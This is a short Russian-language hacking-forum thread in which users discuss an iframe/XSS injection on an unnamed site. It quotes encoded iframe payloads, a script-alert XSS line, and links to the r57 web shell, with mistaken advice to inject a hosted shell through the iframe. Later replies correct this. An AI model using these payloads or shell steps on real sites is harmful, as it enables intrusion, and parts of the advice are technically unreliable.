Есть уязвимость которая позволяет подставить %3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя:))

<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

%3CIFRAME%20SRC=http://ya.ru%20%3C
яндекс появился))
%3CIFRAME%20SRC=http://hack.net/r57shell.php - что это даст?

значит это инклуд!!! подставляй вместо яндекса шелл

инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(

http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...

вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php

Error 404!

/hack/r57shell-inversa.php
File Not Found!

Error 404!

/hack/r57shell-inversa.php
File Not Found!
Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.

Фух, давай по инструкции просто пиши %3CIFRAME%20SRC=http://angerrr.nm.ru/sh.php%20%3C
login: vasja
pass: vasja

я пробывал так......думаеш я дурак....не пашет оно!!!! вылазит окно с записанным исходным кодом шелла.....

мда...
Вы через ифрэйм пытаетесь получить шелл? мдя....
Здесь тока Xss

тоесть через ифрейм нифига не сделаешь?

Можно провести Xss...
Забудь про шелл...
Т.к. в этом случае скрипт шелла выполняет хост на котором лежит шелл, но не сайт с ифрэмом

Думаю, ответ ясен.Ничего не сделаешь, инфрейм.И какой толк от хсс) Закрыто.